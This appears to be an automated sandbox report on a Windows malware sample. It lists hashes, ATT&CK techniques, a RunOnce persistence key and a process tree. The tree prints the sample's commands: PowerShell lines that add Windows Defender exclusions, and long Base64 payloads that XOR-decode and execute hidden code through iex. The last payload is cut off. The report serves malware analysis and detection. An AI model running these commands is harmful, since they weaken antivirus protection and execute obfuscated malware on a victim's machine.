2e96258f3dd21d059f59831295d32d324a849c87bc5a2149a49c97fcf5783558

Analysis

max time kernel
150s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 17:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-25/unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe
Size

3.9MB
MD5

ca535cb7f416a9b0c6404cc5d9d0c380
SHA1

afa7cc852d8f33ad8fdc34ec24acd7ffa5250d06
SHA256

ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432
SHA512

46d804e65a4b9d1c0080672ce470f9610d3fc45f37b91c4d52af1faab48d73ffe24db63015e80086146898cddb0d0bd00643d1a0682cbc6ce3bc84182b871854
SSDEEP

98304:n7gPBIcLPRvhj1yj/9R9T5/gKxzD0d0WMdS0kGmd:ILzj1G9T5JxzD00NSd

Score

8^/10

defense_evasion execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3048	powershell.exe
336	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 44.002.0087.0001 = "C:\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.YourPhone_5wekybbf8bbwe\\cach\\YourPhone.exe"	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4428	powershell.exe
4428	powershell.exe
3048	powershell.exe
3048	powershell.exe
632	powershell.exe
632	powershell.exe
336	powershell.exe
336	powershell.exe
2432	powershell.exe
2432	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	336	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	powershell.exe
Token: SeSecurityPrivilege	2432	powershell.exe
Token: SeTakeOwnershipPrivilege	2432	powershell.exe
Token: SeLoadDriverPrivilege	2432	powershell.exe
Token: SeSystemProfilePrivilege	2432	powershell.exe
Token: SeSystemtimePrivilege	2432	powershell.exe
Token: SeProfSingleProcessPrivilege	2432	powershell.exe
Token: SeIncBasePriorityPrivilege	2432	powershell.exe
Token: SeCreatePagefilePrivilege	2432	powershell.exe
Token: SeBackupPrivilege	2432	powershell.exe
Token: SeRestorePrivilege	2432	powershell.exe
Token: SeShutdownPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeSystemEnvironmentPrivilege	2432	powershell.exe
Token: SeRemoteShutdownPrivilege	2432	powershell.exe
Token: SeUndockPrivilege	2432	powershell.exe
Token: SeManageVolumePrivilege	2432	powershell.exe
Token: 33	2432	powershell.exe
Token: 34	2432	powershell.exe
Token: 35	2432	powershell.exe
Token: 36	2432	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	powershell.exe
Token: SeSecurityPrivilege	2432	powershell.exe
Token: SeTakeOwnershipPrivilege	2432	powershell.exe
Token: SeLoadDriverPrivilege	2432	powershell.exe
Token: SeSystemProfilePrivilege	2432	powershell.exe
Token: SeSystemtimePrivilege	2432	powershell.exe
Token: SeProfSingleProcessPrivilege	2432	powershell.exe
Token: SeIncBasePriorityPrivilege	2432	powershell.exe
Token: SeCreatePagefilePrivilege	2432	powershell.exe
Token: SeBackupPrivilege	2432	powershell.exe
Token: SeRestorePrivilege	2432	powershell.exe
Token: SeShutdownPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeSystemEnvironmentPrivilege	2432	powershell.exe
Token: SeRemoteShutdownPrivilege	2432	powershell.exe
Token: SeUndockPrivilege	2432	powershell.exe
Token: SeManageVolumePrivilege	2432	powershell.exe
Token: 33	2432	powershell.exe
Token: 34	2432	powershell.exe
Token: 35	2432	powershell.exe
Token: 36	2432	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	powershell.exe
Token: SeSecurityPrivilege	2432	powershell.exe
Token: SeTakeOwnershipPrivilege	2432	powershell.exe
Token: SeLoadDriverPrivilege	2432	powershell.exe
Token: SeSystemProfilePrivilege	2432	powershell.exe
Token: SeSystemtimePrivilege	2432	powershell.exe
Token: SeProfSingleProcessPrivilege	2432	powershell.exe
Token: SeIncBasePriorityPrivilege	2432	powershell.exe
Token: SeCreatePagefilePrivilege	2432	powershell.exe
Token: SeBackupPrivilege	2432	powershell.exe
Token: SeRestorePrivilege	2432	powershell.exe
Token: SeShutdownPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeSystemEnvironmentPrivilege	2432	powershell.exe
Token: SeRemoteShutdownPrivilege	2432	powershell.exe
Token: SeUndockPrivilege	2432	powershell.exe
Token: SeManageVolumePrivilege	2432	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 4364	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	83
PID 4972 wrote to memory of 4364	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	83
PID 4364 wrote to memory of 4620	4364	net.exe	85
PID 4364 wrote to memory of 4620	4364	net.exe	85
PID 4972 wrote to memory of 4428	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	86
PID 4972 wrote to memory of 4428	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	86
PID 4428 wrote to memory of 3048	4428	powershell.exe	88
PID 4428 wrote to memory of 3048	4428	powershell.exe	88
PID 4972 wrote to memory of 632	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	90
PID 4972 wrote to memory of 632	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	90
PID 632 wrote to memory of 336	632	powershell.exe	92
PID 632 wrote to memory of 336	632	powershell.exe	92
PID 4972 wrote to memory of 2432	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	94
PID 4972 wrote to memory of 2432	4972	unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe	94

C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Windows\system32\net.exe
  "net" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -EncodedCommand JABiAGMAYQBhAGEAPQAnAGIARQBRAFEASgBsAGsAZgBFAGsAQQA4AGMAaQBnAGIAWQBFAFUAVQBOAEYAawBJAEEAVQBNAEwAQwBRAFkAQgBXAGgAawBNAEkAVwBBAG0ATwAwAGMAZwBlAFYATQB2AFcAaABvAG0AZgAxAGcAbQBGAFUARQBOAGYAeABvAGQAVwBrAFEAVABLAFgAQQBJAGMAbgBBAEwAQwBGAE0AWgBZAEMAQgAzAEoAWABNADAAQgBWADgAegBlAFYATQBqAFcAagBFAEEATgAyAEEAbQBHAFYAZwBLAFYAegBRAFkAWQBFAFUAWABLAFgAWQBrAEYAUQBBAHcAQwBCAHAAYwBXAGsAVQB1AE8ARgBnAGQAQQBWAHcATgBmAFEAVQBLAGMAdwA0AG0AQwBuAFUAZABPADIASQBLAEMARABRAFUAVwBrAFkANgBEAEcAQQAyAGMAawBRAEwAVgBoAG8AdgBXAGoAOABBAEMAMgBNAHAARQBWAHcAeABmAHgAbwBiAFkARQBVAEUAUABYAEEASQBJAEYAbwBnAGUAVgBNADYAWQB5ADgASQBKADMATQAzAEMAUQBVAEwAVQBTAFEAWABjAEQAUgB6AEYAbABzAG0AZABsADgATABDAFEAWQA1AFgAVAA4AHUAUABXAEEAaQBBAFgAMABJAGIAVABBAEcAWQB5AEIAMgBjAHcAPQA9ACcAOwAkAGEAbQBkAGsAPQAnADkAdwBCAE4AOgBxAEMANABpADoAYgBtACcAOwAkAHIAegBjAGkAeABrAGYAaAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGMAYQBhAGEAKQA7ACQAYQBkAHAAdgBpAGIAcgA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAByAHoAYwBpAHgAawBmAGgALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAcgB6AGMAaQB4AGsAZgBoAFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAYQBtAGQAawBbACQAaQAlACQAYQBtAGQAawAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhAGQAcAB2AGkAYgByACkAKQB8AGkAZQB4AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -EncodedCommand JABoAGcAbwBvAHYAawBrAD0AJwBIAEYAdwAwAEQAUwBzAFoAQwB5ADAANgBFAGkAZABBAEUARgAwAHcASAB5AHMATwBHAEMANABOAGEAUQBsAGEASwBnAEUAbwBDAGgASQBnAEkAaQBvAG0ARwBWAHgAMABLAGcASQBDAFYAQwBvAGcARABDAHcATABIAHgAVgBHAEsAbAB3ADMAQQBnAEkATwBhAHgAMABOAGEARgB4AEMARQBEAGgAVABEAGcARQB5AEgARABJADEARwBWAHgANABLAGkAawBrAEgAQgBJAGcAQQBEAFUATQBOAHoAdABEAEUARgAwAHoAQQBnAFEAaQBEAEcAMAAyAGEAQgBVAEgASwBsADAASwBFAHkAbwBiAEcARABFAEwASABRAHAAUgBBAHgAWQBDAEkAUQBjAGIASQBnADgATQBhAEQAdABQAEsAbAA0AGUASgB4AEkAdwBhAHkAawBOAE4AaABWADAASwBpAGMAawBJAEIARQB2AEMARABFADMASAB4AFYAQQBFAEYAMABnAEYAaABBAHgARwBEAEUAMgBhAEIAbABlAEUAMQAwAHcASAB3AEkATwBPAFQAYwBtAEcAVgB4AGgARQB6AGMAcwBEAEEARQB4AEUARwBnAE4ATQBTAHQATQBBAEMAeABYAFAAUwBrAGcAYgB6AEkATgBhAFEAbABpAEwAUwBjAEsARgBoAEkAawBHAEIAQQBPAEQAVAA5AGQARQB6AGgAUwBXAEEAPQA9ACcAOwAkAHkAZABvAG4AdAB2AGcAPQAnAEkAbwBmAGUASAB3AFoAWQBvAFoAbQA2ACcAOwAkAHkAbQBkAHYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABnAG8AbwB2AGsAawApADsAJABjAHUAZQBmAG8AdABjAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHkAbQBkAHYALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAeQBtAGQAdgBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHkAZABvAG4AdAB2AGcAWwAkAGkAJQAkAHkAZABvAG4AdAB2AGcALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwB1AGUAZgBvAHQAYwApACkAfABpAGUAeAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -EncodedCommand JABiAG4AZwB3AHUAPQAnAGUAUgBFADkAVABHAGwAawBZADIAUQBqAEwAdwBZAHcAWgBHAGMAaABBAFYAQQBBAFkAegBvAEkATwBBAE0ARABhAFEARQBoAEIAVgBCAGUAWABXAFkAUABPAEEATQBHAFUARABzAEQAUQBXAG8AQgBYAFMARQB6AFAARQBFAGkAWgBXAFEARABRAFcAbAAwAEMARwBVAEoAVwAxAG8AOABhAFEARgBhAEIARgBKAHIAWQAyAE0AeQBQADEAbABoAFkAVwBRADUAQgBHAEkAQQBaAHkAOABKAEIAbQBBAGkAVgB4AFUASQBSAEgAOQBZAEIARAA0AEkAUABHAE4AZwBmAEMAOAA5AFEARgBKADAAZgAyAEkAUABCAGcAYwB0AGUAaABKAGYAVQAyAEUAQgBaADIAWQBtAFAAWABnADkAVQBoAEUANQBYADEAZABrAFMAVABvAHcATABXAFEALwBVAEcAUQBjAFUAMQBWAHcAYwB3AEkAdwBQAEUANAA3AGEAbQBVACsAUQBHAGMAQgBlAHkAYwB3AFAASABoAG4AZQBoAFYAZQBjAGwAWgA3AGMAegA0AEkAQgBtAFEARwBVAEQAdABXAFEAMgBsAHIAZQAyAFkAUABPAEgAUQBDAGEAZwA0AGgAUgBtAFoAMABkADIAWQBMAEsASABjAGoAWgBRAEYAYQBSAEYAQgByAFoAegBvAGwARQBVAFUAOABVAFQAcwBwAFgAbABJAEIAQgBUAEUANgBPAEgAUQBZAGEAUQA0AE0AUQBHAGMAQgBlAHkAYwB3AFAASABoAG4AZQBoAEEAaABBAFYAQQBBAFkAegBvAEkATwBBAE0ARQBhAGcARgBhAFgAMQBFAEIAQQBXAEUAbABFAG0AUQBtAGEAbQBRAEgAQgBHAGwAZQBYAFMAOABqAEwAdwBZAHcAZQBSAEYAYQBCAFYARgAwAFIAbQBFAGwARQBtAFIAbABhAGoAcwBiAFgAVgBBAEIAWABXAFkATwBBAG4AZAB1AGUAaABVADkAUQBWAGQAawBTAFMAVQBsAEUAVQBVADgAYQBUAHQAZQBXAEcAbABkAGQAegB3AFAATABGAGsAdwBZAHcAVQB1AFgAMQBGAGQAWgB5AFUASQBMADAAVgBnAFYAMgBRAEgAUgBGAEYAMABaAEQARQBoAEsARwBRAGoAVQBoAEUAaABBAEYAWgBlAEEAQwB3AG0AQQBIAGcAaABWAHcARgBhAEIASABwAHcAQQBEAGcATwBLAEgAYwBnAGUAaABWAGUAWABGAEYAZQBZAEQARQBtAFAAQQBNAGgAVgB4AFUAdQBYADEASgBlAGYAegBrAE8ATABHAHcAbgBVAEQAOABFAFUAMQBaAEoAUQBqADAATwBCAG4AdwBsAGEAagBnAGgAUgBGAGQANwBhAEQARQA2AE8ASABjADgAVQBRAEUASABYAGwAWgA3AFEAUwBJAEoAVwBrAFUAOABVAFQAcwBwAFgAbABJAEIAQgBTAE0AKwBCAG0AQgBqAFYAeABVAEkAUQAzADkAdwBjAEQAMABJAFAARgA0ADkAVgBoADQAZgBRAEYAQgBLAEIAQgBJAEkAVwBHAEEAaQBWAHgAVQBEAFUASAB4AEoAUQBqADAASgBMAEUASgBuAFUAQgBGAFcAWABGAEoASwBjAEcAOABqAEwAbABJADcAVgB4AFYAZQBZAEcAbwBCAFcAVABvAHcASQAyAEEAawBhAFEARQA5AFkAVwBwAHIAZgB5AFEAagBLAEEAYwBDAGEAZwA0AGgAUgBtAFoAMABkADIAWQBMAEsASABjADgAVgB6AHMAbABSAG0AcABkAGYAeQBZAE8ASQAyADkAZwBmAEcAUQBEAFcAWABwAHcAVgBqADAASgBMAEUASgBuAFUAQgBGAFcAWABGAEoASwBCAEIASQBJAFcARwBBAGkAVgB4AFUAdQBRAEcAawBBAFkARABFAG4ASwBGADAAdwBWAGkAdwBjAFgAMQBKAGUAZgB6AGsATwBMAEcAdwBuAFUARAA4AHUARABYAHAAdwBZAHkARQBMAFcARwBRAGcAVQBXAFEAcABSAG0AUgBLAFkAeQBNAHoAUABIAGcAbABVAFQAOQBhAGUAMgBsAHIAVwBXAFkAaABMADMAYwBrAGUAaABVADkAUQAxAEkAQQBZAHkARQBJAFcAWABBAGwAZgB6ADAAaABRAGwAZABrAEIARwBZAGgAUABRAFoAZwBmAEMAOAA5AFcAVgBGAGsAWgB6AHMASgBQAEgAaABqAFUAagA4AHUARABYAHAAMABYAFQAcwBqAEsARgBFADgAVQBqAHMAaABXADEAZAAwAGEAeQBZAEoAQQBnAE0AUwBhAFEANABoAFgAbABCAGUAWABTAEUATwBMAEYAbwBoAFUAVAA4AEUAVQAxAFoASwBjAEQAMABMAEIAbgBnADQAVgB4AEUAMQBSAEYAQgBhAEIAQgBNAHcATQAzAGcAOQBVAEQAcwBEAFEAMQBkADAAWABTAEEASQBBAG4AUgB1AGUAaABFADUAUgAxAEEAQgBaAEQARQBQAEUAbgBjADUAQgB5AGMAcwBkAFgAbABLAGMAMgA4AGwARQBVAEoAdQBlAGgARQA1AFIAMQBBAEIAWgBEAEUAUABFAFUAVQA4AFUAUQBFAEgAWABsAFoANwBRAFMASQBKAEUAbgBkAHUAZQBoAFUAOQBRAEYASgAwAGYAMgBJAFAAQgBnAGMAdABlAGgANABZAFUAMgBVAEIAVwBUAG8ASgBCAG0ATQBqAFoAMgBRAGwAUgBXAGwAawBmADIAWQBqAEkAMABVAHcAZQBSAEIAWABVADMAOQBrAEIARABvAGoASwBHAFIAbABhAGoAcwBiAFgAVgBBAEIAWABXAFkATwBBAG4AUgB1AGYAQwB3AGIARABYAHcAQQBBAFcARQBMAFAARwA4AHcAZQBCAFUAOQBSAFcAbwBCAFcAVwBZAHcAQgBsAG8AdQBlAEEAVQB0AEEAMwB4AEsAWQB5AE0ASgBXAFUANABrAFYAdwBFACsAVQAyAE4AZwBjAHgAawB3AE0AMQBVAGoAWgBtAFEAaABXADIAbABrAFkAMgBjAEkATABHAEEAOABaAFIARQBwAFQAbABJAEQAZAB6AHcATwBMAEYAbwBoAFUAVAA4AHUAUQBHAEYAcgBXAFQAbwB6AFcARwBCAG4AYQBRAFUAdQBXAG0ASgBKAFEAVABVADgATQAzAGcANwBVAEQAZwBoAFYAMgBKAGsAWQB5AEkATABQAEEATQAwAFkAZwA0AHQAUQAyAEYAMABkADIAWQB6AFAAVQA0AGEAVQBXAFEAaABYAEYARgAxAFMAUQBjAHoAUABIAGcAbABhAGcARQBMAFcARgBBAEMAUwBSAGcATABQAEgAZwB1AFUAVwBVAGgAUQBtAGwAZABZAEMATQA5AFAAQQA5AG0AVQBEAG8AdABXADEARQBCAEIARABvAHkARQBXAEIAawBhAFEARQBiAEEAVwBwAGUAZQB6AHMAbABMAEgAdwArAFYAMgBRADUAVgAyAG8AQgBkAHoAdwBMAEwAVQA0AE4AVQBXAFUANQBUAFcAWgAwAFcAUwBBAEkAQgBtAE0AaQBhAFEANABIAFcASABsAEoAUQBtAEUAZwBJADEANAArAGEAUQBFAGYAVABsAEoAYQBjAEcAOABqAEsARgA0AGYAYQBRADQAKwBRAEcARgAwAGQAMgBZAHcATwBGADAAaQBZAGcARQA5AFgAMgBGADAAZAAyAE0ASgBFAGwARQB2AGUAQQBWAGEAYwBXAHAAcgBZAHoAbwBtAEEASABBADgAYQBSAE0ASABRAGwAZAByAGUAeQB3AGgATAAyADgAbgBmAHoAMABwAFgAMgBsADIAQQBDAFkASQBCAFcAQgBuAGEAUQA0AGkAVwAzADEAMwBlAEMAWQBsAEUAVQBVADgAYQBnADQAMQBYAEYAZAAwAFYAVAA4AGoATAB3AFkAdwBaAHoAcwA1AEIAMwA5AGwAZgB6AHcATABMAEcAQQA4AFYAdwBFAFgAVwBHAGwAMQBZAHoANABKAFcAVQBJAEMAVQBEAHMARABXAG0AawBCAFoAeQA4AGoASwBBAGMAUwBhAGcARQBEAFIAMQBaAGcAYwBDAEkANwBNADIAYwB3AGUAUgA0AEgAWABXAGwAawBRAFMAdwBMAEEAVQBWAGcAZQBSAEYAVwBCAGwAZABlAFgAUwBZAHoAUABHAEEAaQBlAGgASgBmAFUAMgBkAGUAWgAyAFUAbQBQAFgAZwA5AFUAaABFADUAWAAxAGQAawBTAFQAbwB3AEwAVwBRAC8AVQBHAFEAYgBaAFYAQgBlAFgAUwBNAHoAVwBWAG8AZwBhAGcARQBZAFUAMwA5AGwAWgB5AHcAdwBNADMAdwBkAGEAUgBVAHUAWAAyAGwANwBkAHoAbwB3AEkAMgA4AHcAZgB3AE0AWABRAG0AawBCAEMAQwBNADgASQAxAG8AZwBhAFEAVQB0AGYAbABGAGQAWQB6AG8ASgBCAG4AQQA5AFYAeABFAEQAQgBtAGwAZwBjAEMASQAvAEIAVwBBAGkAWgB4AEUANQBCAG0AbABrAFIAagBFADUATABGAG8ANQBVAGgARQA1AFQAbABkADMAUQBtAEUAZwBJADEASgBtAGEAVABzAEgAUgBGAEYANwBXAGoARQA2AE8ASABRAFkAYQBRADQATQBRAEcAWQBCAGYAegBrAHcAUABHAFIAbQBVAFIARQA1AFgAMgBWADAAZAB5AHcATABXAG4AZwA3AFYAeAA0ADkAUgBGAEYAZQBWAFMAdwAvAFcAVwBCAG4AZQBoAFYAZQBkAGwARgAwAFMAUwBBAE8AVwBuAGgAbgBhAGcANABsAEIARwBCAGsAYQB3AFkASQBBAEgAdwAvAFYAeAA0ADkAVwBGAEIAZQBYAFQAbwBKAEUAbgBjAGoAWQBSAEYAVwBRAFYAZAAxAGYAMgBZAEkAVwBIAFEAZABhAFQAMABMAFEAbABKAGsAQgBEAGcAKwBXAFEATQBVAGEAZwA0ADkAQgBHAGwAcgBlAHkAWQB3AE0AMwBzAHcAZgB3AEEAaABCAEcAcAByAGUAMgBZADgAVwBWADQANwBVAFQAMABwAEIAbQBwAGsAWABTAFUAegBQAEgAdwBrAGEAUQBVAHUAUQBHAEIAMABYAFQAMAB3AEwARwBBAGkAZgBDAHcAYwBYADEAYwBBAFoAegBzAEwATABGAG8AawBWAGcAVgBhAGMAbABaADAAWgB6AHcATwBNADIAUQBuAFUAVwBSAGEAWQBWAEoAawBBAEQAbwArAEwARgBvAGoAVQBnADQAKwBVADIATgBnAGMARABnAC8ATABXAGMAZwBaAGkAOABNAEEAMwB4AEsAWQAyAFUATwBQAEcAdwA0AFUAZwBFAFgAQQBYADkAWQBkAHkAVQBJAEwAQQA5AGsAWQBCAEUAcABUAFcAbAAxAFkAegBvAEoAQgBnAGMAbgBVAFQAcwBwAEIARwBsAGcAYwBHADgAagBLAEcAUQA2AGEAZwBFAFgAVABtAGwAbgBRAG0ARQBnAEkAMQBKAG0AYQBUAHMASABSAEYARgA3AFcAaQBNAC8AQgBtAEEAdABWAHgARQBwAFQAVgBkADIAWABTAE0ATwBMAEcAQQB1AFYAegBzAHAAUgAzAHAAMwBBAFQARQBnAFcAbgBRAEMAZgBpAHcAdABlAG4AbABKAFEAbQBFAGcASQAxAEoAbQBhAFQAcwBIAFIARgBGADcAVwBpAE0ALwBCAG0AQQB0AFYAeABFAHAAVABWAGQAMgBmAHkAQQBPAFAAQQBOAG4AZQBoAEoAZgBVADMAMQAzAFYAbQBFAGwARQBtAFIAawBWAHcARQAxAFcAMQBKAGsAUwBXAE0AbQBCADMAaABuAGEAZwA0AGwAQgBHAFUAQgBXAFQAbwBJAEEASABCAGwAYQBnAEUARABSADIAcABrAGUAeQBVAHcATwBIAGQAdQBlAGgAVQA5AEIARgBCAGQAWgB6AG8AbABFAFUAVQA4AFYAMgBVADUAVwBWAEoAMABYAFMAVQBQAE8AQQBNAFAAYQBnAEUAYgBXAEcAVgAwAEMAQQBVAE8AUABBAEkAdwBZAHcAVQB1AFgAMQBkADcAZQAyAGMAdwBQADAAVgBnAGUAUgA0AEwAQgBXAGwAZQBXAFMAWQBJAEkAMQAwAGkAWQBnAEUAWABSADEARQBBAFYAUgBNAHcAUABBAGMALwBVAFQAcwA5AFkARgBkADAAZAB5ADgATwBLAEgAZAB1AGUAaABVADkAVwBXAHAAawBTAFMAdwB3AFAAMABWAGcAZQBSAEUAZgBCAG0AcABrAFEAagBFADYATwBIAGMAKwBlAFIAVQBJAFgAMQBKAGUAZgB6AGsATwBMAEcAdwBuAFUARAA5AGEAWQBXAHAAcgBmAHkAUQArAEIAbgBBAGoAYQBRAFUAQgBYAFYAeAA2AGMARAA4AGwARQBVAEkARQBhAFEARQBMAFIARgBBAEEAWQB6AG8ASgBBAGcAYwBEAGEAbQBRAEgAVwBHAGwANwBaAHkAVQB3AFAARwBRAEMAYQBnADQAaABSAG4AcAB3AEEAQgBRAHoAVwBHAFEAbgBVAFcAUgBiAFUAMwBsADAAQgBDAHcASQBMAEUANQBtAGEAUgBVAHUAUQBHAFYANwBlAHkAWQB3AFcAVgBJADcAVQBEADgAdQBYADIAcAByAGEAegA0AE8ATABGAEkAKwBlAGgAVgBlAFoAVgBCAGUAWABTAE0AegBXAFYAbwBnAGEAZwBFAFkAVQAzAGwAMABDAEcAUQBPAEIAbABvAG4AYQBnAEUANQBRAFgAcAB3AEEAQQBJAHcATQAyAFIAbgBVAGcARgBhAFcAbABCAEsAYwBEADAATwBXAEcAQQA2AFUAaABFAEQAUgAxAFoAZwBjAEMASQA4AEwASABBAHQAVQBtAFoAYQBYAEYARgBrAFoARABFAGcATABFAFoAbABhAGcARQBjAFUAMwA5AGwAWQB6ADQASgBXAFUASQBHAGEAZwA0ADkAVwAzAHAAdwBZADIAUQB6AEIAawBJACsAVQBHAFEARABCAEYAZABhAGMAQwBJADQATABHAEEAdABhAG0AVQBsAFIARgBCADcAWQB5AFkASQBXAFEASQB3AGUAUgBFADEAUQBHAGwAawBhAHkANAB6AFcARgA0AG0AZQBoAFYAZQBjADEARQBBAGUAegB3AHcAUAAwAFYAZwBWAFEAZABTAEMAUQA9AD0AJwA7ACQAcwBxAHkAZQB2AGoAbgBvAD0AJwAzAFYAbwA0ADMAMwAxAFYAagBrADYAVwAnADsAJAByAHoAcwBpAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAbgBnAHcAdQApADsAJAB1AG0AYwBnAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHIAegBzAGkALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAcgB6AHMAaQBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHMAcQB5AGUAdgBqAG4AbwBbACQAaQAlACQAcwBxAHkAZQB2AGoAbgBvAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHUAbQBjAG